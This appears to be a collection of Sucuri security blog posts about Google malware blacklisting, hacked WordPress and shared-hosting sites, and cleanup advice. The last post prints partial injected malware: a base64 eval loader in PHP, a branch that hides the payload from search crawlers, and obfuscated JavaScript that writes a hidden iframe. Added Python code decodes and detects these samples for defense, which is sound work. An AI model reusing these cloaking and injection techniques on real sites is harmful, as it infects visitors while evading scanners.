New Google Chrome Blacklist Warning for Macs

If you go to a site that is blacklisted by Google, you will now see a new (and prettier) malware warning if you are using a Mac:

The Website Ahead Contains Malware!
Google Chrome Has Blocked access to site.com for now.
Even if you have visited this site safely in the past, visiting it now may infect your Mac with malware.

Nothing major has changed, but we found this new wording to be more clear for the end user. So good move from the Google/Chrome team.

Dealing with WordPress Malware

A few months back I contributed to a post for Smashing Magazine on the top 4 WordPress infections. It was released yesterday, and it couldn’t have come at a better time. If anyone attended WordCamp Las Vegas you might even find some similarities. Fortunately, in the process of preparing for the event and working with the team, we were able to compile a bit more information expanding on the things we originally discussed in the last post. It’s perfect timing for a number of reasons, and will complement this post very nicely.

WordPress Malware
The idea of this post, like many in the past, is to outline and discuss this past weekend’s presentation. In the process, hopefully you take something away. Unfortunately, the presentation was capped off with a live attack and hack, and I won’t be able to include that in this post, but I promise it’s coming.

Note: If you plan to be at WordCamp Philadelphia 2012 you might be in for some treats, just saying. And if you don’t have it on the calendar, you should.


Website Cross-contamination: Blackhat SEO Spam Malware

We recently posted about Website Cross-Contamination, which we see quite a bit of in shared hosting environments. This post is a follow-up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push its campaign.

We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:


Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

If you have any questions about malware, blacklisting, or security in general, send them to us at contact@sucuri.net and we will answer here.

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, its owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review is requested until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 minutes (about 13 hours)
  • Minimum time: 290 minutes (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once it has been cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files; fix them. If you remove them, they will return a 404, and a 404 will delay the verification (even if you need to leave the file with a size of 0, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.


Will Google blacklist itself?

We were analyzing an infected site today and their Google blacklist diagnostic said the following:

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including site.com/, google.com/.

Hmm… So google.com was somehow infected as well? I know it is probably some small sub-site within Google, but I found it interesting that they listed Google’s main domain in there.

If you look at Google’s own diagnostic page, it says:

31 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-03-28, and the last time suspicious content was found on this site was on 2011-03-28.

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, google.com appeared to function as an intermediary for the infection of 71 site(s) including our-pretty-pets.blogspot.com/, daum.net/, portovelhodownload.blogspot.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 72 domain(s), including tamansoftware.co.cc/, agusnih.co.cc/, duniamisteri.co.cc/.

Let’s see if Google actually blacklists themselves :)

Google blacklist – No way to request a review for the last two days

We have been seeing a big issue with Google for the last few days. Whenever a site got blacklisted, you had the option to request a review once the site was clean, something like this:

[Image: Request blacklist review, Google]


GoDaddy hacked – Fixing the “headers already sent” error

As you saw over the last few days, various sites at GoDaddy were exploited, causing lots of complaints on Twitter and in other places about GoDaddy security.

Well, today many of those sites were reinfected (again) and GoDaddy tried to fix them automatically. However, their scripts failed for some reason, leaving some sites with empty lines at the top of the PHP files, which causes these errors to show up:

Warning: Cannot modify header information – headers already sent by (output started at..

So, if your sites are showing these errors, just run this script:

http://sucuri.net/malware/helpers/clear_php.txt

(right click – save as clear_php.txt, rename it to clear.php, upload it to your site via FTP, then open your browser and execute it as yoursite.com/clear.php; delete clear.php once it has run so it is not left exposed on the site).

That should fix these issues. If you need any help, contact us at http://sucuri.net/support
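For readers who would rather see what such a cleanup does, here is an added example (not Sucuri’s clear_php.txt, which this page links but does not show) that removes the blank lines left before the opening PHP tag, the exact cause of the “headers already sent” error above. Handling a UTF-8 BOM is an assumption beyond what the page describes; files with anything other than whitespace before the tag are left alone for manual review.

```python
import os
import tempfile
from typing import List

# Constructed sample of the damage described above: blank lines left before the
# opening tag, which PHP sends as output before header() can run.
BROKEN = "\n\n   \n<?php\nheader('Location: /home');\n"

def strip_leading_output(source: str) -> str:
    """Remove whitespace (and a UTF-8 BOM; assumption beyond the page) before the first PHP tag.

    Files whose pre-tag content is anything other than whitespace are returned
    unchanged so they get a manual look instead of a blind rewrite.
    """
    body = source[1:] if source.startswith("\ufeff") else source
    stripped = body.lstrip(" \t\r\n")
    return stripped if stripped.startswith("<?") else source

def fix_tree(root: str) -> List[str]:
    """Rewrite every .php file under root that has leading output; return changed paths."""
    changed = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape", newline="") as fh:
                original = fh.read()
            fixed = strip_leading_output(original)
            if fixed != original:
                with open(path, "w", encoding="utf-8", errors="surrogateescape", newline="") as fh:
                    fh.write(fixed)
                changed.append(path)
    return sorted(changed)

def self_check() -> int:
    """Run fix_tree on a throwaway directory holding one broken and one healthy file."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "index.php"), "w", newline="") as fh:
            fh.write(BROKEN)
        with open(os.path.join(tmp, "ok.php"), "w", newline="") as fh:
            fh.write("<?php echo 'fine';\n")
        changed = fix_tree(tmp)
        with open(os.path.join(tmp, "index.php"), newline="") as fh:
            assert fh.read().startswith("<?php")
        return len(changed)  # 1: only index.php needed fixing

if __name__ == "__main__":
    print(self_check())
```

Run it against a copy of the site first; stripping whitespace is harmless, but the script deliberately refuses to touch files where real content precedes the tag.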

Blacklisted sites at Netsol

In the last few days many sites hosted at Network Solutions got blacklisted by Google. In all of them the report from Google was:

URL: sitename
Last checked: June 2, 2010
General problem
When Google last tested this page, no content was returned from your server.
Instead, the browser was redirected to a malicious web page. It is likely
that your server configuration has been modified.

On the ones that we manually checked, the sites were clean and malware-free (no redirection). They were all hosted at the IP address 205.178.145.65, and it looks like their other servers were not affected.

What happened? It seems that either that server was compromised, affecting all sites on it, or there is a bug in Google’s malware checker.

If your site got blacklisted, you are hosted at that IP address, and the warning page says something along these lines:


Google top 1000 sites: Interesting stats about them

Google recently published a list of the top 1000 most visited websites in the world. We found that list very interesting and decided to take a closer look at them.

These are the stats we collected:

  1. Web servers in use
  2. Programming language in use
  3. Sites using WordPress
  4. Sites using jQuery
  5. Sites using Google Adsense
  6. Sites using Google Analytics
  7. Sites that don’t work without the www
  8. Sites using ChinaCache

A few of these numbers really amazed us. Nginx, for example, was used on 15% of the sites, very close to IIS at only 17%. jQuery is being used on almost 30% of the top sites, and 42% are using Google Analytics.


Malware hiding from Google

Google is getting pretty good at detecting web-based malware and blacklisting the sites that are hosting it. This means bad business for the attackers (or “hackers”, as the media like to call them), and as a result they are already changing their tactics to hide from Google.

Why is this bad business for the malware writers? Well, if a site gets blacklisted, fewer users will visit it, so fewer people will load their malware and get infected. Good for everyone else, bad for them.

Anyway, yesterday we were analyzing malware that added the following code to the index.php of a site:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
…(very long line)…")); ?>

After decoding it, we got code that looked like this:

if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") &&
    (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo")))
{
    return base64_decode("PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+");
}
else
{
    return "";
}

So basically the malware was checking whether the user agent belonged to the Google or Yahoo bot and, in that case, not returning the malware. Everyone else would be served the malicious JavaScript:

var bpxDsSbm8='d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
*%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r
;eval(bpxDsSbm8.split('*%@').join(""));

If that becomes a trend, Google will have to stop using its well-known user agent and IP addresses for the malware check, since cloaking like this makes a crawler-only scan see a clean page.
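The practical lesson for site owners is that a scanner must decode the eval(base64_decode()) blob and read what it does, rather than fetch the page as a crawler would. The following added example (not Sucuri’s code, and not the real blobs from the infection above; the samples are constructed) decodes such blobs statically, flags the HTTP_USER_AGENT/crawler-name branch as a cloaking indicator, and rebuilds the split/join-padded JavaScript string without running it. The list of bot names is an assumption extended beyond the page’s googlebot/yahoo pair.

```python
import base64
import re
from typing import Dict, List, Optional

# The injected form seen above: eval(base64_decode("...")), allowing the /**/
# padding, stray spaces and either quote style.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)", re.I)
# Crawler names a cloaking check compares HTTP_USER_AGENT against (assumed list).
BOT_WORDS = ("googlebot", "yahoo", "slurp", "bingbot", "msnbot")
# The JavaScript trick at the end of the post: 'd*%@o*%@c'.split('*%@').join("")
SPLIT_JOIN_RE = re.compile(
    r"var\s+(\w+)\s*=\s*'([^']*)'\s*;\s*eval\(\s*\1\.split\('([^']+)'\)\.join\(\"\"\)\s*\)")

def decode_eval_payloads(php_source: str) -> List[str]:
    """Plaintext of every eval(base64_decode(...)) blob in a PHP file, never executed."""
    out = []
    for b64 in EVAL_B64_RE.findall(php_source):
        try:
            out.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue  # malformed blob: leave it for manual review
    return out

def is_user_agent_cloaking(php_code: str) -> bool:
    """True when the code branches on HTTP_USER_AGENT against a crawler name."""
    lowered = php_code.lower()
    return "http_user_agent" in lowered and any(w in lowered for w in BOT_WORDS)

def deobfuscate_split_join(js: str) -> Optional[str]:
    """Rebuild the padded string the split/join idiom would eval, statically."""
    m = SPLIT_JOIN_RE.search(js)
    if not m:
        return None
    _, padded, sep = m.groups()
    return "".join(padded.split(sep))

def scan_php_file(php_source: str) -> Dict[str, object]:
    payloads = decode_eval_payloads(php_source)
    return {"encoded_evals": len(payloads),
            "cloaking": any(is_user_agent_cloaking(p) for p in payloads)}

# Constructed samples shaped like the page's fragments (not the real blobs).
CLOAKING_PHP = ('if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&'
                '(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) { return "x"; } else { return ""; }')
SAMPLE_INDEX_PHP = ('<?php /**/ eval(base64_decode("'
                    + base64.b64encode(CLOAKING_PHP.encode()).decode() + '")); ?>')
SAMPLE_JS = "var bpxDsSbm8='d*%@o*%@c*%@u*%@m*%@e*%@n*%@t';eval(bpxDsSbm8.split('*%@').join(\"\"));"
if __name__ == "__main__":
    print(scan_php_file(SAMPLE_INDEX_PHP))   # {'encoded_evals': 1, 'cloaking': True}
    print(deobfuscate_split_join(SAMPLE_JS))  # document
```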
